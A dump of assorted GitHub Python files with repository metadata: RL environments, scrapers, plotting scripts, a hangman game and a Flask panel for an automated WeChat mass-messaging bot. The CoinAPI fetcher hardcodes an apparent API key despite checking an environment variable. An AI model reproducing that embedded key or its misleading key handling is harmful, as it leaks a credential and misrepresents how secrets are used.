stateis\n \n cl.send('HTTP/1.0 200 OK\\r\\nContent-type: text/html\\r\\n\\r\\n')\n cl.send(response)\n cl.close()\n \n except OSError as e:\n cl.close()\n print('connection closed')","repo_name":"mehdidjitli/Projet-personnel","sub_path":"Automatic-watering/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"39400630929","text":"import numpy as np\nimport matplotlib.pylab as plt\nfrom renderer import *\nfrom datetime import datetime\nimport os\n\n\nclass Agent:\n def __init__(self, i, world):\n self.i = i\n self.world = world\n self.x = np.random.uniform(size=2)\n self.v = np.zeros_like(self.x)\n self.history = []\n self.store_history()\n\n def update(self, action):\n self.v += action\n\n norm = np.linalg.norm(self.v)\n if norm > .1:\n self.v /= norm\n self.v *= .1\n self.x += self.v\n\n if np.max(np.abs(self.x)) > 2.:\n self.v = np.zeros_like(self.v)\n self.x = np.clip(self.x, -1.95, 1.95)\n\n self.store_history()\n\n def get_state(self):\n return np.concatenate((self.x, self.v)).flatten()\n\n def store_history(self):\n self.history.append(np.copy(self.x))\n\n\nclass World:\n def __init__(self, n_agents):\n self.n_agents = n_agents\n self.reset()\n self.state_dim = 8\n self.action_dim = 2\n\n def reset(self):\n self.agents = [Agent(i, self) for i in range(self.n_agents)]\n return self.get_state()\n\n def get_state(self):\n return [agent.get_state() for agent in self.agents]\n\n def step(self, action):\n self.agents[0].update(np.random.uniform(-.1, .1, size=2))\n self.agents[1].update(action * .1)\n d = self.agents[0].x - self.agents[1].x\n d = np.linalg.norm(d)\n r = -d\n event = d < .1\n s = [agent.get_state() for agent in self.agents]\n return s, r, False, event\n\n\nclass DiscreteWorld(World):\n def __init__(self, n_agents):\n super().__init__(n_agents)\n self.action_dim = 5\n\n def transform_action(self, action):\n if action == 0:\n action = [0., 0.]\n elif action == 1:\n action = [.1, 0.]\n elif action == 2:\n action = [.0, .1]\n elif action == 3:\n action = [-.1, 0.]\n elif action == 4:\n action = [0., -.1]\n return action\n\n def step(self, action):\n action = self.transform_action(action)\n return super().step(action)\n\n\nclass TargetWorld(DiscreteWorld):\n def __init__(self, n_agents):\n super().__init__(n_agents)\n\n def step(self, action):\n action = self.transform_action(action)\n self.agents[0].update(np.random.uniform(-.1, .1, size=2))\n self.agents[1].update(action)\n d = self.agents[0].x - self.agents[1].x\n d = np.linalg.norm(d)\n r = -1\n event = d < .1\n s = [agent.get_state() for agent in self.agents]\n done = np.linalg.norm(self.agents[1].x) < .1\n return s, r, done, event\n\n\nclass MoveAgent:\n def __init__(self):\n self.x = np.random.randint(0, 5, size=2)\n self.history = []\n self.store_history()\n\n def update(self, action):\n self.x += action\n self.x = np.clip(self.x, 0, 5)\n self.store_history()\n\n def store_history(self):\n self.history.append(np.copy(self.x))\n\n\nclass MoveWorld:\n def __init__(self):\n super().__init__()\n self.reset()\n self.state_dim = 6\n self.actions = [[0, 0], [1, 0], [0, 1], [-1, 0], [0, -1]]\n self.action_dim = len(self.actions)\n\n def reset(self):\n self.agents = [MoveAgent() for _ in range(2)]\n self.target = np.zeros(2)\n return self.get_state()\n\n def step(self, action):\n self.agents[0].update(\n self.actions[np.random.randint(len(self.actions))])\n self.agents[1].update(self.transform_action(action))\n event = all(self.agents[0].x == self.agents[1].x)\n done = all(self.agents[1].x == self.target)\n return self.get_state(), -1, done, event\n\n def get_state(self):\n return np.concatenate((np.array([a.x for a in self.agents]).flatten(), self.target)).flatten()\n\n def transform_action(self, action):\n return self.actions[action]\n\n\nclass MoveAgentContinuous:\n def __init__(self, init_low, init_high):\n self.x = np.random.uniform(init_low, init_high, size=2)\n self.v = np.zeros_like(self.x)\n self.history = []\n self.store_history()\n\n def update(self, action):\n self.v += action\n norm = np.linalg.norm(self.v)\n if norm > 1:\n self.v /= norm\n self.x += self.v\n if max(self.x) > 1 or min(self.x) < -1:\n self.v = np.zeros_like(self.v)\n self.x = np.clip(self.x, -1, 1)\n self.store_history()\n\n def store_history(self):\n self.history.append(np.copy(self.x))\n\n\nclass MoveWorldContinuous:\n def __init__(self):\n super().__init__()\n self.reset()\n self.state_dim = 6\n self.action_dim = 2\n\n def reset(self):\n self.agents = [MoveAgentContinuous(0 - i, .5 - i) for i in range(2)]\n self.target = np.random.uniform(.5, 1, size=2)\n return self.get_state()\n\n def step(self, action):\n self.agents[0].update(np.random.uniform(-.05, .05, size=2))\n self.agents[1].update(action * .05)\n d = self.agents[0].x - self.agents[1].x\n d = np.linalg.norm(d)\n event = d < .1\n d_target = np.linalg.norm(self.target - self.agents[1].x)\n r = - 1\n done = d_target < .1\n return self.get_state(), r, done, event\n\n def get_state(self):\n return np.concatenate((np.array([a.x for a in self.agents]).flatten(), self.target)).flatten()\n\n def transform_action(self, action):\n return self.actions[action]\n","repo_name":"lenzbelzner/psyco","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":5545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3538939122","text":"from storyscript import loads\n\n\nclass SLSJSONCompiler:\n \"\"\"\n Allows compiling Storyscript via a LSP request.\n \"\"\"\n\n def compile(self, doc, features):\n output = loads(doc.text(), features)\n return {\n \"errors\": [self.error_to_json(error) for error in output.errors()],\n \"deprecations\": [\n self.error_to_json(dep) for dep in output.deprecations()\n ],\n \"success\": output.success(),\n \"result\": output.result().output() if output.success() else None,\n }\n\n @staticmethod\n def error_to_json(error):\n \"\"\"\n Convert an individual error message to JSON.\n \"\"\"\n error.process()\n return {\n \"code\": error.error_code(),\n \"hint\": error.hint(),\n \"position\": {\n \"line\": error.int_line(),\n \"column\": error.start_column(),\n \"end_column\": error.end_column(),\n },\n }\n","repo_name":"wilzbach/storyscript-sls","sub_path":"sls/compile.py","file_name":"compile.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9429094931","text":"from weboob.browser.pages import HTMLPage\nfrom weboob.browser.elements import ListElement, ItemElement, method\nfrom weboob.browser.filters.standard import CleanText, DateTime, CleanDecimal, Regexp\nfrom weboob.browser.filters.html import Link, XPath\nfrom weboob.capabilities.gauge import Gauge, GaugeMeasure, GaugeSensor\nfrom datetime import timedelta\nimport re\n\n\nclass IndexPage(HTMLPage):\n @method\n class get_harbor_list(ListElement):\n item_xpath = \"//a[@class='Port PP'] | //a[@class='Port PS']\"\n\n class item(ItemElement):\n klass = Gauge\n\n obj_id = CleanText(Link('.'), replace=[('/', '')])\n obj_name = CleanText('.')\n obj_city = CleanText('.')\n obj_object = u'Port'\n\n def validate(self, obj):\n if self.env['pattern']:\n return self.env['pattern'].lower() in obj.name.lower()\n return True\n\n @method\n class get_harbor_infos(ItemElement):\n klass = Gauge\n\n def _create_coef_sensor(self, gauge_id, AM=True):\n name = CleanText('//tr[@class=\"MJE\"]/th[4]')(self)\n _name = 'matin' if AM else 'aprem'\n value = self._get_coef_value(AM=AM)\n\n if value:\n coef = GaugeSensor(u'%s-%s-%s' % (gauge_id, name, _name))\n coef.name = '%s %s' % (name, _name)\n coef.lastvalue = value\n coef.gaugeid = gauge_id\n\n coef.history = []\n for jour in range(0, 7):\n measure = self._get_coef_value(AM=AM, jour=jour)\n if measure:\n coef.history.append(measure)\n\n return coef\n\n def _get_coef_value(self, AM=True, jour=0):\n if AM:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[1]' % jour), strict=False)(self)\n value = CleanText('//tr[@id=\"MareeJours_%s\"]/td[3]/b[1]' % jour)(self)\n else:\n time, value = None, None\n if len(XPath('//tr[@id=\"MareeJours_%s\"]/td[1]/b' % jour)(self)) > 1:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[2]' % jour), strict=False)(self)\n value = CleanText('//tr[@id=\"MareeJours_%s\"]/td[3]/b[2]' % jour)(self)\n\n if time and value:\n measure = GaugeMeasure()\n measure.level = float(value)\n measure.date = time + timedelta(days=jour)\n return measure\n\n def _create_high_tide(self, gauge_id, AM=True):\n name = CleanText('//tr[@class=\"MJE\"]/th[3]')(self)\n _name = 'matin' if AM else 'aprem'\n value = self._get_high_tide_value(AM=AM)\n\n if value:\n tide = GaugeSensor(u'%s-%s-PM-%s' % (gauge_id, name, _name))\n tide.name = u'Pleine Mer %s' % (_name)\n tide.unit = u'm'\n tide.lastvalue = value\n tide.gaugeid = gauge_id\n\n tide.history = []\n for jour in range(0, 7):\n measure = self._get_high_tide_value(AM=AM, jour=jour)\n if measure:\n tide.history.append(measure)\n\n return tide\n\n def _get_high_tide_value(self, AM=True, jour=0):\n if AM:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[1]' % jour), strict=False)(self)\n value = CleanDecimal('//tr[@id=\"MareeJours_0\"]/td[2]/b[1]', replace_dots=True)(self)\n else:\n time, value = None, None\n if len(XPath('//tr[@id=\"MareeJours_%s\"]/td[1]/b' % jour)(self)) > 1:\n time = DateTime(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]/b[2]' % jour),\n strict=False, default=None)(self)\n value = CleanDecimal('//tr[@id=\"MareeJours_0\"]/td[2]/b[2]', replace_dots=True,\n default=None)(self)\n\n if time and value:\n measure = GaugeMeasure()\n measure.level = float(value)\n measure.date = time + timedelta(days=jour)\n return measure\n\n def _create_low_tide(self, gauge_id, AM=True):\n name = CleanText('//tr[@class=\"MJE\"]/th[3]')(self)\n _name = 'matin' if AM else 'aprem'\n value = self._get_low_tide_value(AM=AM)\n\n if value:\n tide = GaugeSensor(u'%s-%s-BM-%s' % (gauge_id, name, _name))\n tide.name = u'Basse Mer %s' % (_name)\n tide.unit = u'm'\n tide.lastvalue = value\n tide.gaugeid = gauge_id\n\n tide.history = []\n for jour in range(0, 7):\n measure = self._get_low_tide_value(AM=AM, jour=jour)\n if measure:\n tide.history.append(measure)\n\n return tide\n\n def _is_low_tide_first(self, jour):\n return XPath('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour)(self)[0].getchildren()[0].tag != 'b'\n\n def _get_low_tide_value(self, AM=True, jour=0):\n slow_tide_pos = 1 if self._is_low_tide_first(jour) else 2\n m = re.findall('(\\d{2}h\\d{2})', CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour)(self))\n\n re_time = '(\\d{2}h\\d{2}).*(\\d{2}h\\d{2}).*(\\d{2}h\\d{2})'\n re_value = '(.*)m(.*)m(.*)m'\n if len(m) > 3:\n re_time = '(\\d{2}h\\d{2}).*(\\d{2}h\\d{2}).*(\\d{2}h\\d{2}).*(\\d{2}h\\d{2})'\n re_value = '(.*)m(.*)m(.*)m(.*)m'\n\n if AM:\n time = DateTime(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour),\n re_time,\n '\\\\%s' % slow_tide_pos), strict=False)(self)\n\n value = CleanDecimal(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[2]' % jour),\n re_value,\n '\\\\%s' % slow_tide_pos),\n replace_dots=True, default=None)(self)\n\n else:\n slow_tide_pos += 2\n time, value = None, None\n if len(m) > slow_tide_pos - 1:\n time = DateTime(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[1]' % jour),\n re_time,\n '\\\\%s' % slow_tide_pos), strict=False)(self)\n\n value = CleanDecimal(Regexp(CleanText('//tr[@id=\"MareeJours_%s\"]/td[2]' % jour),\n re_value,\n '\\\\%s' % slow_tide_pos),\n replace_dots=True, default=None)(self)\n\n if time and value:\n measure = GaugeMeasure()\n measure.level = float(value)\n measure.date = time + timedelta(days=jour)\n return measure\n\n def obj_sensors(self):\n sensors = []\n high_tide_PM = self._create_high_tide(self.obj.id)\n if high_tide_PM:\n sensors.append(high_tide_PM)\n high_tide_AM = self._create_high_tide(self.obj.id, AM=False)\n if high_tide_AM:\n sensors.append(high_tide_AM)\n low_tide_AM = self._create_low_tide(self.obj.id)\n if low_tide_AM:\n sensors.append(low_tide_AM)\n low_tide_PM = self._create_low_tide(self.obj.id, AM=False)\n if low_tide_PM:\n sensors.append(low_tide_PM)\n coef_AM = self._create_coef_sensor(self.obj.id)\n if coef_AM:\n sensors.append(coef_AM)\n coef_PM = self._create_coef_sensor(self.obj.id, AM=False)\n if coef_PM:\n sensors.append(coef_PM)\n return sensors\n","repo_name":"laurentb/weboob","sub_path":"modules/mareeinfo/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":7988,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"75"} +{"seq_id":"38666112983","text":"#Fed Model\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport openpyxl\nimport numpy as np\nfrom datetime import datetime\npath = \"/Users/macbook/desktop/GF-FedModel/data.xlsx\"\n\ndate_column = []\nnominal_yield = []\nearnings_yield = []\nmmfData = []\nmmf_yield=[]\nname = \"Fed Model by Day\"\ndef readData(path):\n wb = openpyxl.load_workbook(path)\n sheet = wb.active\n for i in range(11,sheet.max_row +1):\n cell1 = sheet.cell(row = i, column = 2)\n cell2 = sheet.cell(row = i, column = 3)\n datecell = sheet.cell(row=i,column = 1)\n mmf = sheet.cell(row=i,column = 9)\n if i<2441:\n mmfData.insert(0,float(mmf.value))\n if (int(cell1.value)==0 or int(cell2.value)==0):\n continue\n else:\n nominal_yield.append(float(cell1.value))\n earnings_yield.append(100.0/(float(cell2.value)))\n date_column.append(datecell.value)\n\ndef readWeek(path):\n wb = openpyxl.load_workbook(path)\n sheet = wb.active\n for i in range(11,sheet.max_row +1,7):\n cell1 = sheet.cell(row = i, column = 2)\n cell2 = sheet.cell(row = i, column = 3)\n count = 0\n while (int(cell1.value)==0 or int(cell2.value)==0):\n count+=1\n cell1 = sheet.cell(row = i+count,column = 2)\n cell2 = sheet.cell(row = i+count,column = 3)\n \n nominal_yield.append(float(cell1.value))\n earnings_yield.append(100.0/(float(cell2.value)))\n name = \"Fed Model by Week\"\n\ndef plotData(x_data, yield1, yield2, name):\n plt.figure()\n plt.plot(x_data, yield1, label='Yu E Bao', color='blue')\n plt.plot(x_data, yield2, label='CSI 800', color='red')\n plt.xlabel('Year')\n plt.ylabel('Rate %')\n plt.title(name)\n plt.xticks(rotation=45)\n plt.legend()\n plt.show()\n\ndef plotResiduals(date_column,data,data1):\n plt.figure(figsize=(10, 6))\n a = mdates.date2num(date_column)\n # 使用numpy进行线性回归拟合\n coefficients = np.polyfit(a, data, 1)\n slope = coefficients[0]\n intercept = coefficients[1]\n trend_line = slope * mdates.date2num(date_column) + intercept\n\n # 计算残差(实际数据减去趋势线)\n residuals = data - trend_line\n\n coef = np.polyfit(a,data1,1)\n slope1 = coef[0]\n intercept1 = coef[1]\n trend_line1 = slope1 * mdates.date2num(date_column) + intercept1\n\n residuals1 = data1 - trend_line1\n # 绘制残差图\n plt.plot(date_column, residuals, label='Bond Yield', color='blue')\n plt.plot(date_column, residuals1, label='CSI 500 Earnings Yield', color='red')\n plt.axhline(y=0, color='green', linestyle='--', label='Zero line')\n plt.xlabel('Years')\n plt.ylabel('Residuals')\n plt.title('Residuals of Yield Data')\n plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y'))\n plt.gca().xaxis.set_major_locator(mdates.YearLocator())\n plt.legend()\n plt.xticks(rotation=45)\n plt.tight_layout()\n plt.show()\n\nreadData(path)\n\n#plotData(date_column, mmfData, earnings_yield, name)\nplotResiduals(date_column,nominal_yield,earnings_yield)\n\n\n\n\n\n","repo_name":"aochannn/GF-FedModel","sub_path":"fed_model.py","file_name":"fed_model.py","file_ext":"py","file_size_in_byte":3103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22577801483","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nURLを入力して、スクレイピングして名詞のデータ集める\n\"\"\"\n\nimport scrape_morph as morph\nimport xl_control as xl\n\n\n\nxlfile = 'excel/category13.xlsx'\nurls = xl.getURLs(xlfile)\ni = 1\nfor url in urls:\n words_list = morph.getNouns(url)\n xl.addData(words_list,xlfile)\n print(str(i)+\" : Add New Data:\")\n print(url)\n i+=1\n\n# xl.test()\nprint(\"Complete\")\n","repo_name":"KuwaNori/graduation_thesis","sub_path":"classify/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28040451577","text":"import os\n\nimport scrapy\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\nclass BrightermondaySpiderSpider(scrapy.Spider):\n name = \"brightermonday_spider\"\n allowed_domains = os.environ.get(\"BRIGHTERMON_DOMAIN\").split(\",\")\n start_urls = os.environ.get(\"BRIGHTERMON_URLS\", \"\").split(\",\")\n\n custom_settings = {\n \"FEEDS\": {\n \"brightermon_listings.json\": {\n \"format\": \"json\",\n \"encoding\": \"utf8\",\n \"overwrite\": True,\n }\n }\n }\n\n def parse(self, response):\n for listing in response.css('div[data-cy=\"listing-cards-components\"]'):\n title = listing.css(\"a::attr(title)\").get()\n company = listing.css(\"p.text-sm.text-link-500::text\").get()\n\n if company is not None:\n company = company.strip()\n else:\n company = \"Brighter Monday\"\n\n region = listing.css(\"div span::text\").get().strip()\n urls = [listing.css(\"a::attr(href)\").get()]\n\n yield {\n \"title\": title,\n \"company\": company,\n \"region\": region,\n \"urls\": urls,\n }\n","repo_name":"TrippleA-Ashaba/beeblebrox","sub_path":"jobcrawler/jobcrawler/spiders/brightermonday_spider.py","file_name":"brightermonday_spider.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37038127743","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python3\n\nimport sys\n\n \nfrom PyQt5.uic import loadUiType\n\nui_Hangman,HangmanBaseClass = loadUiType('hangman.ui')\n\nfrom PyQt5.QtCore import Qt\n\nclass Hangman(HangmanBaseClass, ui_Hangman):\n\n def __init__(self):\n super(Hangman, self).__init__()\n\n self.setupUi(self)\n\n\n self.word_to_guess = \"cryptographic\"\n self.guessed = \"_\"*len(self.word_to_guess)\n\n self.wordLabel.setText(self.guessed)\n\n self.setFocusPolicy(Qt.StrongFocus)\n\n def keyPressEvent(self, event):\n print(\"keyPressEvent: {}\".format(event.text()))\n\n text = event.text().lower()\n\n if text:\n if text in self.word_to_guess:\n for i, c in enumerate(self.word_to_guess):\n if c == text:\n self.guessed = self.guessed[:i]+text+self.guessed[i+1:]\n\n self.wordLabel.setText(self.guessed)\n \n super(Hangman, self).keyPressEvent(event)\n\n\n \n\nif __name__ == '__main__':\n from PyQt5.QtWidgets import QApplication\n\n import sys\n app = QApplication(sys.argv)\n\n hangman = Hangman()\n hangman.show()\n\n app.exec()\n","repo_name":"TheBluPika919/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31571972501","text":"from flask import Flask, jsonify, request\n\napp = Flask(__name__)\n\n\na_lst = [\n\n]\n\n\n@app.route('/sort')\ndef sort():\n b = {\n 'asc': request.json['asc'],\n 'array': request.json['array']\n }\n c = b['array']\n sort(c, key=lambda x: x['name'])\n print(c)\n return jsonify({'b': {'succes': True, 'array': c}})\n\n\napp.run(debug=True)\n","repo_name":"catarium/Tournament","sub_path":"projects/Catarium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21389289392","text":"from flask import render_template, flash, redirect,g,url_for,session,request,jsonify\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom app import app,lm,db\nfrom .models import User,Wxbot\nfrom .forms import LoginForm,RegistrationForm\nfrom .wechat import wx_is_login_state,wx_logout,wx_login_bat,allowed_file,GetWechatNum,DeleteCache\nimport os\nimport hashlib\nimport time\n\nIpfrequency={} #ip频率检测\n\n@app.before_request\ndef before_request():\n g.user = current_user\n try:\n if 'MicroMessenger' in request.headers['User-Agent']:\n return render_template('error.html')\n except:\n return render_template('error.html')\n\n\n\n@app.route('/')\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n try:\n isfile=os.path.isfile(g.user.imgpath)\n except:\n isfile=False\n if not g.user.is_authenticated:\n return render_template('wechat.html',\n isfile=isfile,\n function_list=Wxbot().GetSetting())\n if g.user.isadmin:\n return render_template('wechat.html',\n isfile=isfile,\n function_list=Wxbot().GetSetting())\n else:\n return render_template('wechat.html',\n isfile=isfile,\n function_list=Wxbot().GetSetting())\n\n@lm.user_loader\ndef load_user(id):\n return User.query.get(int(id))\n\n#登录\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n # g 对象 存储生命周期内已经登录的用户,不用再次登录 直接重定向至 主页\n if g.user is not None and g.user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user is not None and user.verify_password(form.password.data):\n session['remember_me'] = form.remember_me.data\n login_user(user, form.remember_me.data)\n return redirect(request.args.get('next') or url_for('index'))\n flash('Invalid username or password.')\n return render_template('login.html',\n title='Sign In',\n form=form)\n#注册\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(email=form.email.data,\n password=form.password.data,\n pid=999999,\n isadmin=False)\n user.save()\n flash('注册成功,请使用注册帐号登录吧!')\n return redirect(url_for('login'))\n return render_template('register.html', form=form)\n\n#退出登录\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n###微信视图\n@app.route('/wechat', methods=['GET', 'POST'])\ndef wechat():\n return redirect(url_for('index'))\n\n\n@app.route('/wechat/login/', methods=['GET', 'POST'])\ndef wechat_login():\n if GetWechatNum()>30:\n flash('服务器达到最大负载,请稍后重试')\n return redirect(url_for('index'))\n #频率检测\n try:\n ip=request.remote_addr\n except:\n flash('非法调用')\n return redirect(url_for('index'))\n try:\n if int(time.time())-Ipfrequency[ip][1]>60:\n Ipfrequency[ip] = [1, int(time.time())]\n else:\n Ipfrequency[ip][0]=Ipfrequency[ip][0]+1\n if Ipfrequency[ip][0]>=3:\n flash('调用次数过多,请1分钟后重试')\n return redirect(url_for('index'))\n except:\n Ipfrequency[ip]=[1,int(time.time())]\n ####\n try:\n if 'wechat' in request.headers['Referer']:\n flash('请勿重复获取')\n return redirect(url_for('index'))\n except:\n flash('请勿重复获取')\n return redirect(url_for('index'))\n setting=Wxbot().GetSetting()\n temp = request.args.get('timestamp')\n if not setting['Onbot']:\n flash('管理员禁止登录')\n return redirect(url_for('index'))\n\n if g.user.is_authenticated:\n if g.user.sendtext==None and g.user.imgpath==None and setting['Oncustom']:\n flash('请先设置发送内容')\n return redirect(url_for('index'))\n ret = wx_is_login_state()\n if not ret:\n wx_logout()\n WX_PID = wx_login_bat(temp)\n if WX_PID:\n flash('请在60秒内扫码登录,过期失效')\n return render_template('wxchat/wxlogin.html',\n img_path='%s.jpg' % temp,\n is_wxchat=ret,\n active_page='wechat_login',\n function_list=setting)\n flash('获取二维码失败,请重新获取')\n wx_logout()\n return render_template('wxchat/wxlogin.html',\n img_path=False,\n is_wxchat=ret,\n active_page='wechat_login',\n function_list=setting)\n flash('请勿重复登录')\n return redirect(url_for('index'))\n #未登录用户获取二维码\n WX_PID = wx_login_bat(temp)\n if WX_PID:\n flash('请在120秒内扫码登录,过期失效')\n return render_template('wxchat/wxlogin.html',\n img_path='%s.jpg' % temp,\n is_wxchat=False,\n active_page='wechat_login',\n function_list=setting)\n flash('获取二维码失败,请重新获取')\n return redirect(url_for('index'))\n\n\n\n\n@app.route('/wechat/setting', methods = ['POST','GET'])\ndef wechat_setting():\n if not g.user.is_authenticated:\n flash('注册登录后使用,自定义消息')\n return redirect(url_for('index'))\n if request.method == 'POST':\n user = g.user\n file = request.files['file']\n if file and allowed_file(file.filename):\n ext = file.filename.split('.')[1]\n name = '%s' % g.user.email + str(time.time())\n name=hashlib.md5(name.encode()).hexdigest()[:15]\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], '%s.%s'%(name,ext)))\n user.imgpath=os.path.join(app.config['UPLOAD_FOLDER'], '%s.%s'%(name,ext))\n user.cover =url_for('.static',filename='cache/%s'%('%s.%s'%(name,ext)))\n flash('上传成功 使用图片内容')\n user.istextimg=False #表示使用图片\n user.save()\n return redirect(url_for('index'))\n\n\n@app.route('/wechat/setting1', methods = ['POST','GET'])\ndef wechat_setting1():\n if request.method == 'POST':\n if not g.user.is_authenticated:\n return jsonify({\n 'text': '注册登录后使用,自定义消息'\n })\n text1 = request.form['text1']\n if len(text1)>50:\n return jsonify({\n 'text':'内容太长,保存失败'\n })\n user=g.user\n user.sendtext = text1\n user.istextimg=True\n user.save()\n flash('上传成功 使用文字内容')\n return jsonify({\n 'text': '上传成功'\n })\n flash('上传失败')\n return redirect(url_for('index'))\n\n@app.route('/wechat/setting3', methods = ['POST','GET'])\n@login_required\ndef wechat_setting3():\n if not g.user.is_authenticated:\n flash('登录成功后,可以使用自定义消息')\n return redirect(url_for('index'))\n if not g.user.isadmin:\n flash('非法调用')\n return redirect(url_for('index'))\n if request.method == 'POST':\n try:\n SendInterval=int(request.form['SendInterval'])\n SendRestnumber = int(request.form['SendRestnumber'])\n SendRest = int(request.form['SendRest'])\n SendOften=int(request.form['SendOften'])\n except:\n return jsonify({\n 'text':'消息间隔设置错误'\n })\n if request.form['Onbot']=='true':\n Onbot=True\n else:\n Onbot=False\n if request.form['Oncustom']=='true':\n Oncustom=True\n else:\n Oncustom = False\n if request.form['Ontail']=='true':\n Ontail=True\n else:\n Ontail = False\n if request.form['OnSendTwoMsg']=='true':\n OnSendTwoMsg=True\n else:\n OnSendTwoMsg = False\n TailText1=request.form['settext1']\n TailText2 = request.form['settext2']\n TailText3 = request.form['settext3']\n TailText4 = request.form['settext4']\n TailText5 = request.form['settext5']\n setting=Wxbot().get()\n setting.Onbot=Onbot\n setting.Oncustom=Oncustom\n setting.Ontail=Ontail\n setting.TailText1 = TailText1\n setting.TailText2 = TailText2\n setting.TailText3 = TailText3\n setting.TailText4 = TailText4\n setting.TailText5 = TailText5\n setting.SendInterval=SendInterval\n setting.SendRestnumber = SendRestnumber\n setting.SendRest = SendRest\n setting.OnSendTwoMsg=OnSendTwoMsg\n setting.SendOften = SendOften\n setting.save()\n flash('保存成功')\n return redirect(url_for('index'))\n\n@app.route('/wechat/wxlogout/', methods=['GET', 'POST'])\ndef wechat_wxlogout():\n if not g.user.is_authenticated:\n flash('未注册登录用户,请在手机端微信 上方点击退出登录')\n return redirect(url_for('index'))\n ret = wx_is_login_state()\n if ret:\n a = wx_logout()\n flash(a)\n return redirect(url_for('wechat'))\n flash('未登录微信')\n return redirect(url_for('wechat'))\n\n\n@app.errorhandler(404)\ndef internal_error(error):\n return redirect(url_for('index'))\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n db.session.rollback()\n return redirect(url_for('index'))","repo_name":"aduya/WEB-wechat","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27765923700","text":"def get_contact():\n print('Нажмите ~ в поле \"Имя\" после добавления абонента')\n contact = []\n while(True):\n name = input('Имя: ')\n if name == '~':\n break\n contact.append(name)\n surname = input('Фамилия: ')\n contact.append(surname)\n phone = input('Номер телефона: ')\n contact.append(phone)\n info = input('Описание: ')\n contact.append(info)\n print(f'Добавлен абонент: {contact}')\n return contact\n","repo_name":"Kustol/GR3122_Python","sub_path":"PhoneBook/module_add.py","file_name":"module_add.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18187124301","text":"import datetime\nimport json\nimport os\n\nimport requests\n\n\nBASE_URL = \"https://rest.coinapi.io\"\nAPI_KEY = os.environ.get(\"COINAPI_API_KEY\")\n\n\nclass NoAPIKeyError(Exception):\n pass\n\nclass InvalidAPIKeyError(Exception):\n pass\n\n\ndef main():\n \"\"\"This app requests coinapi and gets the historical data of the\n exchange rates of bitcoin in USD.\n\n The coinapi returns only 100 results, and it offers no pagination.\n Therefore, this code implements an algorithm based on datetime calculation\n to retrieve multiple slices of 100 days.\n \"\"\"\n if not API_KEY:\n raise NoAPIKeyError(\n \"Make sure that you use a valid coinapi key as env var COINAPI_API_KEY\"\n )\n\n end = datetime.date.today()\n start = end - datetime.timedelta(days=100)\n\n count = 1\n\n while start > datetime.date(year=2010, month=1, day=1):\n print(f\"{count}: Getting data from {start} to {end}\")\n data = get_history(start, end)\n\n with open(f\"./data/{start}--{end}.json\", \"w\") as f:\n json.dump(data, f)\n\n end = start\n start = end - datetime.timedelta(days=100)\n count += 1\n\n\ndef get_history(start: datetime.date, end: datetime.date) -> requests.Request:\n res = requests.get(\n BASE_URL + \"/v1/exchangerate/BTC/USD/history\",\n params={\n \"period_id\": \"1DAY\",\n \"time_start\": start.isoformat(),\n \"time_end\": end.isoformat(),\n },\n headers={\"X-CoinAPI-Key\": \"FC546E7C-76CF-4D89-9B01-69C5D64421E9\"},\n )\n\n if res.status_code != 200:\n raise InvalidAPIKeyError(\"Your COINAPI_API_KEY returns an error.\")\n\n return res.json()\n\n\nif __name__ == \"__main__\":\n 